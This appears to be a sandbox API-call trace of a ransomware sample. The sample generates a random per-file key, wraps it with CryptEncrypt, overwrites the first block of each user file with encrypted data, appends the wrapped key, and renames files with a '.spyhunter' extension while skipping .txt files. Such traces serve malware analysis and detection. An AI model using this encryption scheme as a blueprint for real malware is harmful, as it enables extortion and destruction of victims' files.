[0148.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0148.067] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed80*=0x30) returned 1 [0148.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\7B d7oV8f_xAwNqzR44n.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\7b d7ov8f_xawnqzr44n.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0148.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\7B d7oV8f_xAwNqzR44n.m4a") returned 71 [0148.067] StrStrW (lpFirst="7B d7oV8f_xAwNqzR44n.m4a", lpSrch=".txt") returned 0x0 [0148.068] GetProcessHeap () returned 0x2c0000 [0148.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.068] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed44*=0x2800, lpOverlapped=0x0) returned 1 [0148.068] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.068] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed44*=0x2800, lpOverlapped=0x0) returned 1 [0148.069] GetProcessHeap () returned 0x2c0000 [0148.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.069] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.069] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x270ed84*, lpNumberOfBytesWritten=0x270ed44*=0x4, lpOverlapped=0x0) returned 1 [0148.069] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed44*=0x30, lpOverlapped=0x0) returned 1 [0148.069] CloseHandle (hObject=0xb0) returned 1 [0148.209] GetProcessHeap () returned 0x2c0000 [0148.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0148.209] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\7B d7oV8f_xAwNqzR44n.m4a.spyhunter") returned 81 [0148.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\7B d7oV8f_xAwNqzR44n.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\7b d7ov8f_xawnqzr44n.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\7B d7oV8f_xAwNqzR44n.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\7b d7ov8f_xawnqzr44n.m4a.spyhunter")) returned 1 [0148.210] GetProcessHeap () returned 0x2c0000 [0148.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0148.210] GetProcessHeap () returned 0x2c0000 [0148.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0148.210] GetProcessHeap () returned 0x2c0000 [0148.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81cd8 | out: hHeap=0x2c0000) returned 1 [0148.210] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed88 | out: pbBuffer=0x270ed88) returned 1 [0148.210] GetProcessHeap () returned 0x2c0000 [0148.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0148.210] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed80*=0x30) returned 1 [0148.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0148.412] StrStrW (lpFirst="Downloads.lnk", lpSrch=".txt") returned 0x0 [0148.412] GetProcessHeap () returned 0x2c0000 [0148.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.412] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed44*=0x3a1, lpOverlapped=0x0) returned 1 [0148.521] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffc5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.522] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed44*=0x3a1, lpOverlapped=0x0) returned 1 [0148.522] GetProcessHeap () returned 0x2c0000 [0148.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.522] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.522] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x270ed84*, lpNumberOfBytesWritten=0x270ed44*=0x4, lpOverlapped=0x0) returned 1 [0148.522] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed44, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed44*=0x30, lpOverlapped=0x0) returned 1 [0148.522] CloseHandle (hObject=0xa0) returned 1 [0149.200] GetProcessHeap () returned 0x2c0000 [0149.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.200] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.spyhunter") returned 63 [0149.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.spyhunter")) returned 1 [0149.202] GetProcessHeap () returned 0x2c0000 [0149.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.202] GetProcessHeap () returned 0x2c0000 [0149.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.202] GetProcessHeap () returned 0x2c0000 [0149.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2388 | out: hHeap=0x2c0000) returned 1 [0149.202] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed80 | out: pbBuffer=0x270ed80) returned 1 [0149.202] GetProcessHeap () returned 0x2c0000 [0149.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.202] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed78*=0x30) returned 1 [0149.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.203] GetProcessHeap () returned 0x2c0000 [0149.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.203] GetProcessHeap () returned 0x2c0000 [0149.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d1b8 | out: hHeap=0x2c0000) returned 1 [0149.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed80 | out: pbBuffer=0x270ed80) returned 1 [0149.203] GetProcessHeap () returned 0x2c0000 [0149.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed78*=0x30) returned 1 [0149.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QS73IZjEOzSRyFUnj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qs73izjeozsryfunj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0149.203] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QS73IZjEOzSRyFUnj.flv") returned 63 [0149.204] StrStrW (lpFirst="QS73IZjEOzSRyFUnj.flv", lpSrch=".txt") returned 0x0 [0149.204] GetProcessHeap () returned 0x2c0000 [0149.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.204] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ed3c*=0x2800, lpOverlapped=0x0) returned 1 [0149.205] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.205] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ed3c*=0x2800, lpOverlapped=0x0) returned 1 [0149.205] GetProcessHeap () returned 0x2c0000 [0149.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.205] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.205] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed3c, lpOverlapped=0x0 | out: lpBuffer=0x270ed7c*, lpNumberOfBytesWritten=0x270ed3c*=0x4, lpOverlapped=0x0) returned 1 [0149.205] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed3c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed3c*=0x30, lpOverlapped=0x0) returned 1 [0149.205] CloseHandle (hObject=0xa0) returned 1 [0149.205] GetProcessHeap () returned 0x2c0000 [0149.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.206] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QS73IZjEOzSRyFUnj.flv.spyhunter") returned 73 [0149.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QS73IZjEOzSRyFUnj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qs73izjeozsryfunj.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QS73IZjEOzSRyFUnj.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qs73izjeozsryfunj.flv.spyhunter")) returned 1 [0149.278] GetProcessHeap () returned 0x2c0000 [0149.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.278] GetProcessHeap () returned 0x2c0000 [0149.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.278] GetProcessHeap () returned 0x2c0000 [0149.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85b90 | out: hHeap=0x2c0000) returned 1 [0149.278] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed78 | out: pbBuffer=0x270ed78) returned 1 [0149.278] GetProcessHeap () returned 0x2c0000 [0149.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.278] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed70*=0x30) returned 1 [0149.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\4nAC2k.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\4nac2k.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0149.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\4nAC2k.avi") returned 77 [0149.279] StrStrW (lpFirst="4nAC2k.avi", lpSrch=".txt") returned 0x0 [0149.279] GetProcessHeap () returned 0x2c0000 [0149.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.279] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ed34*=0x2800, lpOverlapped=0x0) returned 1 [0149.280] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.280] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ed34*=0x2800, lpOverlapped=0x0) returned 1 [0149.281] GetProcessHeap () returned 0x2c0000 [0149.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.281] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.281] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x270ed74*, lpNumberOfBytesWritten=0x270ed34*=0x4, lpOverlapped=0x0) returned 1 [0149.281] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed34*=0x30, lpOverlapped=0x0) returned 1 [0149.281] CloseHandle (hObject=0xa0) returned 1 [0149.726] GetProcessHeap () returned 0x2c0000 [0149.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.728] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\4nAC2k.avi.spyhunter") returned 87 [0149.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\4nAC2k.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\4nac2k.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\4nAC2k.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\4nac2k.avi.spyhunter")) returned 1 [0149.855] GetProcessHeap () returned 0x2c0000 [0149.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.855] GetProcessHeap () returned 0x2c0000 [0149.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.855] GetProcessHeap () returned 0x2c0000 [0149.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f130 | out: hHeap=0x2c0000) returned 1 [0149.855] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed78 | out: pbBuffer=0x270ed78) returned 1 [0149.855] GetProcessHeap () returned 0x2c0000 [0149.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.855] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed70*=0x30) returned 1 [0149.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0149.856] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0149.856] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0149.856] GetProcessHeap () returned 0x2c0000 [0149.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0149.856] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ed34*=0x19c, lpOverlapped=0x0) returned 1 [0149.857] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.857] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ed34*=0x19c, lpOverlapped=0x0) returned 1 [0149.857] GetProcessHeap () returned 0x2c0000 [0149.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0149.857] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.857] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x270ed74*, lpNumberOfBytesWritten=0x270ed34*=0x4, lpOverlapped=0x0) returned 1 [0149.857] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed34, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed34*=0x30, lpOverlapped=0x0) returned 1 [0149.857] CloseHandle (hObject=0xa0) returned 1 [0149.857] GetProcessHeap () returned 0x2c0000 [0149.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.857] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.spyhunter") returned 64 [0149.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.spyhunter")) returned 1 [0149.858] GetProcessHeap () returned 0x2c0000 [0149.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.858] GetProcessHeap () returned 0x2c0000 [0149.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.858] GetProcessHeap () returned 0x2c0000 [0149.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec21c8 | out: hHeap=0x2c0000) returned 1 [0149.858] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed70 | out: pbBuffer=0x270ed70) returned 1 [0149.858] GetProcessHeap () returned 0x2c0000 [0149.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.858] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed68*=0x30) returned 1 [0149.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0149.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0149.859] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch=".txt") returned 0x0 [0149.859] GetProcessHeap () returned 0x2c0000 [0149.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0149.859] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ed2c*=0x499, lpOverlapped=0x0) returned 1 [0149.976] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.977] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x270ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ed2c*=0x499, lpOverlapped=0x0) returned 1 [0149.977] GetProcessHeap () returned 0x2c0000 [0149.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0149.977] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.977] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed2c, lpOverlapped=0x0 | out: lpBuffer=0x270ed6c*, lpNumberOfBytesWritten=0x270ed2c*=0x4, lpOverlapped=0x0) returned 1 [0149.977] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed2c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed2c*=0x30, lpOverlapped=0x0) returned 1 [0149.977] CloseHandle (hObject=0xa0) returned 1 [0149.977] GetProcessHeap () returned 0x2c0000 [0149.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.977] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.spyhunter") returned 73 [0149.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.spyhunter")) returned 1 [0149.978] GetProcessHeap () returned 0x2c0000 [0149.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.978] GetProcessHeap () returned 0x2c0000 [0149.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.978] GetProcessHeap () returned 0x2c0000 [0149.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85938 | out: hHeap=0x2c0000) returned 1 [0149.978] CryptGenRandom 